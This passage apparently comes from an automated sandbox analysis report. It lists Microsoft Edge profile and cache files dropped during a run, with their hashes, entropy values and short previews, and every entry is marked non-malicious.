                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                        Entropy (8bit):5.074842526871519
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNMeIq2PCN23oH+Tcwt7Uh2ghZIFUt8YUz1fNMeZZmw+YUz1fNMezkwOCN20:+1fN6v1YebIhHh2FUt8Z1fNz/+Z1fNpd
                                                                                                                                                                                                        MD5:8650713BE1F07BA046A21E36A0720FE5
                                                                                                                                                                                                        SHA1:46EA522A09A4DAE8EB34E7B36E21175993695BBD
                                                                                                                                                                                                        SHA-256:30FDABCBAF92EA99E98992A9BAEDA32AB1845858F3DE6FAE508D872441DC9105
                                                                                                                                                                                                        SHA-512:73DFFBC0B9C88CA77D7ACA3F45AF95B0D6CFABB16EA7A0F8C5FC3A14E22AB75DAF5B48A23246E9D1F8D2FE8E2E57C25FE73BDAEC68513C733E10870D965EEB13
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.167 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-02:11:11.167 1c84 Recovering log #3.2024/11/11-02:11:11.167 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\2ae02828-e435-46b5-9a19-380d49c01a41.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):290
                                                                                                                                                                                                        Entropy (8bit):4.9786626899774555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:YHpoNXR8+eqq59Qu6hsDHF4R8H2a9a1TS7PMVKJTnMRK3VY:YHO8sqD6hsBd2cag7E4T3y
                                                                                                                                                                                                        MD5:C6A79B1A87A8A6D8EDE748744384411B
                                                                                                                                                                                                        SHA1:982BFD5F082522AA42A93F19F782B905F04AAFEF
                                                                                                                                                                                                        SHA-256:EE57385776A3CAE860759324BF55B561467A7906C7935EDC14811021FF8EC02A
                                                                                                                                                                                                        SHA-512:FC44456A912219A08BCDA23111D9AB41D56485441A760D465D62C2FFC038EB3ABE389EF7D70A4AF7BF44A7176DA63E05AAD8B8BDBDEEFD5F68C410379FCA2462
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793774","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com"}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_0

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsFl:/F
                                                                                                                                                                                                        MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                        SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                        SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                        SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_2

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                        MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                        SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                        SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                        SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\data_3

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                        MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                        SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                        SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                        SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):524656
                                                                                                                                                                                                        Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LsFlPleyll/:LsFl//
                                                                                                                                                                                                        MD5:DCFE90F2B768B5F951A1633627FD5144
                                                                                                                                                                                                        SHA1:6B25AB118C42D21BF5E45A55236AC255BBEACA59
                                                                                                                                                                                                        SHA-256:C4027E5CFD2B218577B2EA5D885B19ADB874740AC5B129474FF55A57DF5D845A
                                                                                                                                                                                                        SHA-512:7FB87ED2B752C2F9F9F1F0C13F2BD284C9C58DFA31439EDA016B62C20AF190BDE23400A8C4E794208071DACE68214FC76601D341EE7959C271B4F56573B316E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................}E..4./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:0\r..m..................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):2.955557653394731
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:AauTEb3Sd:Aabi
                                                                                                                                                                                                        MD5:262F1D11483B9A040ADCBA82F04CE901
                                                                                                                                                                                                        SHA1:31B90361954E5F3E6C67083D41E7161E9D07FE0C
                                                                                                                                                                                                        SHA-256:4E1FB132BEEEA863B151BAA7E2DCAF6BC7B621A4B884B6C43BD2E7B71629A2EF
                                                                                                                                                                                                        SHA-512:45898132A19D7B7BB0071C27020853074FB168AFF37E186489E5C155B16B0B29130A2451B6AF0A81F0C6BF95E9E65D78C5ED9405AA993E9A5F2C48DB44FB354D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.....Noy retne...........................4./.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):2.955557653394731
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:AauTEb3Sd:Aabi
                                                                                                                                                                                                        MD5:262F1D11483B9A040ADCBA82F04CE901
                                                                                                                                                                                                        SHA1:31B90361954E5F3E6C67083D41E7161E9D07FE0C
                                                                                                                                                                                                        SHA-256:4E1FB132BEEEA863B151BAA7E2DCAF6BC7B621A4B884B6C43BD2E7B71629A2EF
                                                                                                                                                                                                        SHA-512:45898132A19D7B7BB0071C27020853074FB168AFF37E186489E5C155B16B0B29130A2451B6AF0A81F0C6BF95E9E65D78C5ED9405AA993E9A5F2C48DB44FB354D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.....Noy retne...........................4./.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:0\r..m..................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:eJluTETq1g+:eJkgTq1d
                                                                                                                                                                                                        MD5:D701930FAD13D26B24DB55A45FC90931
                                                                                                                                                                                                        SHA1:DE5C32D1EB573F963213441E8F6BFE0E210105E7
                                                                                                                                                                                                        SHA-256:A021A28339E7550ECF2FA2D7A86EDF51DC6C53D7F8D0BFE158FC8A069FFDE0FD
                                                                                                                                                                                                        SHA-512:01001C866661AF5B50296011C12954BD47542ACD88B143A29EA05C307ABCA546C947742C067132ADCA026DA5DF36E817E913075CB9FD04EC6535DAC093760DE1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.......oy retne............................4./.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:eJluTETq1g+:eJkgTq1d
                                                                                                                                                                                                        MD5:D701930FAD13D26B24DB55A45FC90931
                                                                                                                                                                                                        SHA1:DE5C32D1EB573F963213441E8F6BFE0E210105E7
                                                                                                                                                                                                        SHA-256:A021A28339E7550ECF2FA2D7A86EDF51DC6C53D7F8D0BFE158FC8A069FFDE0FD
                                                                                                                                                                                                        SHA-512:01001C866661AF5B50296011C12954BD47542ACD88B143A29EA05C307ABCA546C947742C067132ADCA026DA5DF36E817E913075CB9FD04EC6535DAC093760DE1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.......oy retne............................4./.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsFl:/F
                                                                                                                                                                                                        MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                        SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                        SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                        SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                        MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                        SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                        SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                        SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                        MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                        SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                        SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                        SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):262512
                                                                                                                                                                                                        Entropy (8bit):9.629307656487099E-4
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LsFl0lsJ1:LsFKsb
                                                                                                                                                                                                        MD5:D1AC019CF29B0430DFD41E95EB954269
                                                                                                                                                                                                        SHA1:46B451DAC7B62A291E9FA3D0F790E6131AE6AF27
                                                                                                                                                                                                        SHA-256:5F763372228C60957BB909D1815087662A454E34F285100E70F538F70F67E6B8
                                                                                                                                                                                                        SHA-512:10FE3671C7B1AF080D59C930DB5854E44C18B10E5CD191582E1778A35B37EA8B50A3138A4FC4F2CA11C1D968118A7637CC6B9FBC353BEB0D85DA288CEF4DC568
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................*z..4./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):393
                                                                                                                                                                                                        Entropy (8bit):5.153960723796516
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:+1fNTYebvqBvFL21fNWM+v1YebvqBQFUv:+1FTYebv8L21FY1YebvZ2
                                                                                                                                                                                                        MD5:472534FAA588DE7FD9C77B50C24000C3
                                                                                                                                                                                                        SHA1:E9371E2E89D40D1DE9B12C871729E5F6FE10EA36
                                                                                                                                                                                                        SHA-256:5B71CA884B8CD34480F35D66026309B54F7DA1C956A7828C3D94F79A3403E5D1
                                                                                                                                                                                                        SHA-512:F9B2680946CA8194B788AF80D90FEA3172E95CD4BE178473A4904BE3681F244F1AFD3CF80A69DD10CA1EBE2C710ABB60A74BAF3FF559D2702995D19C6FA817F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.445 13fc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..2024/11/11-02:11:11.490 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network Persistent State (copy)

                                                                                                                                                                                                        Download File
